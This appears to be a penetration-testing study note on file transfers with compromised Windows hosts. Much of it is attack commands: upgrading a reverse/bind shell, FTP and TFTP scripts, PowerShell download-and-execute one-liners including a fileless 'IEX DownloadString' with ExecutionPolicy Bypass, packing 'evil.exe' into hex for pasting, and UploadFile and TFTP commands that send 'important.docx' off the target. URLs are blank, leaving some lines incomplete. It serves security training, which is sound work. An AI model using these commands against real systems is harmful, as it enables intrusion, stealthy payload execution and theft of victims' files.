File Transfers
For more practical notes, see File Transfer Techniques
Considerations and Preparations
Dangers of Transferring Attack Tools
- Could be abused by other attackers
- Anti Virus Software will detect and remediate the tools
Installing Pure-FTPd
sudo apt update && sudo apt install pure-ftpd
to configure and start, use this script:
The Non-Interactive Shell
- e.g.: basic bind or reverse shell
- if we then try to start a program which prompt us for an input (← an interaction) we won’t get the prompt message, because the STOUT is not redirected correctly
- to fix this we can upgrade our basic shell by:
- Unix:
python -c 'import pty; pty.spawn("/bin/bash")'
- Unix:
Transferring Files with Windows Hosts
Non-Interactive FTP Download
- assumption: we have a bind shell on our windows target talking with our kali instance
- Windows by default ships with a CLI called:
- We’ll abuse the
flag whichSpecifies a text file containing FTP commands; the commands will automatically run after FTP starts.
copy the file we want to transfer into ftphome:
sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/
restart pure-ftpd:
sudo systemctl restart pure-ftpd
create our command text file:
ftp -v -n -s:ftp.txt
Windows Downloads Using Scripting Languages
- VBScript
place the file you want to upload to the client in the web root:
sudo cp /usr/share/windows-resources/binaries/wget.exe /var/www/html/
create a vbs file which acts like wget:
use that wget to download the file we placed into our web root:
cscript wget.vbs evil.exe
- PowerShell
create a PowerShell script which acts like wget:
use that wget script to download the file we placed into our web root:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
or just use this one-liner:
powershell.exe (New-Object System.Net.WebClient).DownloadFile('', 'evil.exe')
or if we need to be stealthy and not write the file to disk:
- create a powershell script in our web root:
echo 'Write-Output "Hello World"' > /var/www/html/helloworld.ps1
- execute it:
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('')
- create a powershell script in our web root:
Windows Downloads with exe2hex and PowerShell
- The is option will take a bit longer, but it is also less common:
compress our binary:
upx -9 evil.exe
covert it to hex and create a windows script:
exe2hex -x evil.exe -p evil.cmd
copy it to our clipboard:
cat evil.cmd | xclip -selection clipboard
paste the script into our windows shell
- this will redirect the hex data into powershell
- which will assemble it back into a binary
All this is Non-Interactive!
Windows Uploads Using Windows Scripting Languages
place this php code into the web root
: -
create the folder:
mkdir /var/www/uploads
set the permissions:
sudo chown www-data: /var/www/uploads
Remove the php file after your done! Otherwise anybody can create a file on your kali VM
Upload the important file from the target:
powershell (New-Object System.Net.WebClient).UploadFile('', 'important.docx')
Uploading Files with TFTP
If the target is very old (up to Windows XP and 2003) use this method
install a tftp server on kali, set it up and run it:
on our old windows target, run
tftp -i put important.docx
to upload the file
Relevant Note(s): Penetration Testing